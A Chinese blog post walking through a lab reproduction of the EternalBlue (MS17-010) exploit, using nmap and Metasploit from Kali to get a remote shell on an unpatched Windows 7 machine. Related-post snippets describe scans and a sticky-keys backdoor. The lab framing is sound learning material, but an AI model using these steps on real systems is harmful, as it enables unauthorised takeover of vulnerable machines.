Windows永恒之蓝漏洞复现

最新推荐文章于 2024-11-05 10:00:02 发布
最新推荐文章于 2024-11-05 10:00:02 发布
阅读量412 收藏 1
点赞数
文章标签: linux windows 安全性测试 测试用例
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/pythonZLX/article/details/128569350
版权

实验环境

攻击机:kali linux 192.168.1.156

目标机:Windows7 192.168.1.159

要求:未安装ms17-010漏洞补丁,未开启防火墙

开始

扫描目标是否存在ms17-010漏洞

使用nmap 对目标进行扫描

过程可能有点慢 -.-

nmap -T4 --script vuln 192.168.1.159

当出现这写东西的时候证明成功了 (奖励一朵小红花❀)

大概意思就是该系统有ms17-010漏洞,危险因素:高;状态:易受攻击

开始第二步

启动msf

┌──(root㉿kali)-[~]
└─# msfconsole

查找一下ms17-010漏洞

search ms17-010

如果是win2003/winxp系统,就用exploit/windows/smb/ms17_010_psexec

如果是win7/win2008系统,就用exploit/windows/smb/ms17_010_eternalblue

如果是win8/win8.1系统,就用exploit/windows/smb/ms17_010_eternalblue_win8

使用方法是use+对应模块

我这是win7系统所以就是

use exploit/windows/smb/ms17_010_eternalblue

好的!我们已经进入到这个模块了 (再次奖励一朵小红花❀)

第三步 查看该模块属性

show options

对这两个属性进行配置

Rhost:目标主机ip

Rport:目标端口 也就是445

第三个本地ip按理来说不用配置,但是我不配置就会失败不知道什么原因😫

管他呢配置了也没什么问题😕

第四步 启动攻鸡 (小红花缺货暂时没有了/(ㄒoㄒ)/~~)

经过一系列吊炸天的过程,我们得到了meterporeter的回话,这时候我们就掌握了这台电脑了

什么?你说你不信?(╯▔皿▔)╯

我们直接输入shell这把你看看是不是获得了这个win7的控制权限?

我们来输入ipconfig来试一试

啊这.....先别管乱码,你就说成功没1

输入chcp 65001解决乱码

好了,问题解决了

后续的命令就看你自己的了,因为我也是新手,一点点写博客积累经验

我相信总有一天我会从菜鸡变成伟大的菜鸡!!!!!!!!

Win7经典漏洞永恒之蓝复现
qq_42808240的博客
10-20 3085
win7经典漏洞永恒之蓝漏洞利用
Windows7永恒之蓝MS17_010漏洞复现
晚风挽着浮云的博客
11-22 680
永恒之蓝漏洞复现 永恒之蓝永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 环境:kali linux 靶机:Windows 7 ...
永恒之蓝漏洞复现
最新发布
zhuge_long的专栏
11-05 401
1台靶机 win7 关闭防火墙 控制面板->系统和安全->Windows 防火墙 192.168.184.1311台攻击者 kali 192.168.184.129。
[漏洞复现]ms17-010(永恒之蓝复现
一个安全研究员
02-04 2647
如题
win7永恒之蓝微软官方补丁
05-16
没打补丁的赶紧打,网上的关闭端口方法我都试了,关不掉
Windows 2008永恒之蓝漏洞利用与后渗透测试详解
09-23
具体涉及nmap命令实施的端口和服务枚举以及利用永恒之蓝漏洞(MS17-010 EternalBlue)取得目标主机管理访问,最终展示了在已攻破的目标环境中进一步行动的步骤和技术手段。适用于希望了解Windows操作系统特定远程...
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验
2401_84297796的博客
05-03 1663
6、这个选项的用处主要是渗透攻击成功后目标机与LHOST建立的Shell连接,所以LHOST参数设置我们自己本地的IP地址,RHOSTS参数还是目标IP。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
Kali--永恒之蓝漏洞复现
f1245179815的博客
10-24 1150
该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于利用MS17-010漏洞实现远程执行代码,可以覆盖掉目标计算机的内存地址,从而实现攻击者的恶意代码在被攻击计算机上的执行。当目标机开机,程序后台运行,且监听端口为7777,这个端口可以自己设置。
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1)
2401_84297796的博客
05-03 1071
1、msfconsole进入MSF模式,再测试能不能ping通目标主机(192.168.164.129),用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
永恒之蓝漏洞复现(详细版)
Zqinglele的博客
03-20 5478
matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)成功发现可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击
win7四大基础漏洞复现(死亡蓝屏,构造payload,永恒之蓝shift5),以及修复方案
xt350488的博客
06-20 2271
简单理解,用来生成后门的软件。当用户连续按下5次Shift键时,正常情况下,系统会启动一个名为“粘滞键”(Sticky Keys)的辅助功能,其对应的程序是sethc.exe,位于C:\Windows\System32\目录下。然而,在某些未打补丁的Windows 7(SP1)系统上,攻击者可以通过替换或修改sethc.exe文件,使其指向其他程序,如命令提示符(cmd.exe)。一旦sethc.exe被替换,当用户再次连续按下5次Shift键时,就会启动命令提示符,而不是粘滞键。
详细复现永恒之蓝ms17-010
qq_67757718的博客
01-15 170
一、实验环境:没有补丁的win7作为目标机器 Kali作为攻击机器 二、实验步骤 1.首先进入root用户,输入msfconsole进入msf6端 2.利用命令search ms17-010搜索ms17-010漏洞脚本,得到四种不同的模块 3.先使用脚本中的扫描模块,即第三个,输入命令use auxiliary/scanner/smb/smb_ms17_010 4. 查看配置表,show options,可以看到此时RHOSTS是
windows7 ms17-010-ethernalblue漏洞复现
zoixsoadji的博客
04-23 2024
永恒之蓝漏洞简介:  2017年5月12日,一款名为“WannaCry” (也称WannaCrpt、WannaCrpt0r、 Wcrypt、WCRY)的勒索软件在全球范围内爆发,造成极大影响。全球遭遇攻击的国家超过150个,幸免的国家,要么没有电脑,要么没有网络。   “WannaCry"勒索软件主要借鉴了针对微软Windows系统漏洞的“永恒之蓝”(EternalBlue)进行传播扩散,“永恒之蓝攻击程序利用的是Windows SMB远程提权漏洞,可以攻击开放了445 端口的 Windows 系统并
win7永恒之蓝
m0_58596609的博客
11-15 2306
一 使用msfconsole命令开启MSF,并使用search命令搜索永恒之蓝模块 search ms17-010 二 :使用搜索出来的第三个模块来进行探测目标是否存在永恒之蓝漏洞,并设置好以下参数进行扫描测试 >>>use auxiliary/scanner/smb/smb_ms17_010 /模块调用或者使用use 3对搜索出来的模块进行调用. >>>set rhost 192.168.202.131 //设置目标地址 >>&gt...
永恒之蓝漏洞windows7)
Ricklzc的博客
01-10 3832
扫描端口 ┌──(root????kali)-[~/桌面] └─# nmap -sS -p 445 -oG - 192.168.0.0/24 | grep open Host: 192.168.0.18 (localhost) Ports: 445/open/tcp//microsoft-ds/// Host: 192.168.0.26 (localhost) Ports: 445/open/tcp//microsoft-ds/// Host: 192.168.0.44 (localhost) Por
漏洞复现 | win7粘滞键漏洞复现
made_cola的博客
03-20 1746
粘滞键是一种快捷键,是为同时按下两个或多个键有困难的人而设计的,要功能是方便Shift、Ctrl、Alt与其他键的组合使用。启动粘滞键可通过单击“开始→设置→控制面板→辅助功能选项”,在“键盘”选项卡下选中“使用粘滞键”来启动。或者连续按shift键五次。开启粘滞键的时候,任务栏右边的系统托盘区会出现粘滞键图标。而攻击者正是利用了其按五次shift键出现弹窗的特性对系统进行攻击
ms17-010 攻击win7漏洞复现
weixin_30920091的博客
03-14 455
只是为了好玩重新写一篇。利用还是很简单的。 将下载下来的rb放置在:/usr/share/metasploit-framework/modules/exploits/windows/smb/ 目录下 可以先用模块扫描一遍判断一些那些存在漏洞然后再攻击。 msf > use exploit/windows/smb/ms17_010_eternalbluemsf exploit(...
Windows 7 靶机操作 永恒之蓝复刻
chidaoqiannianzq的博客
10-16 993
kali WannaCry
windows10永恒之蓝漏洞复现
05-24
Windows10永恒之蓝漏洞是指微软Windows操作系统的SMBv1协议中的一个安全漏洞,该漏洞最初被美国国家安全局(NSA)利用,后来泄露出来被黑客组织WannaCry等利用。该漏洞可以允许攻击者远程执行代码,获取敏感信息或者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值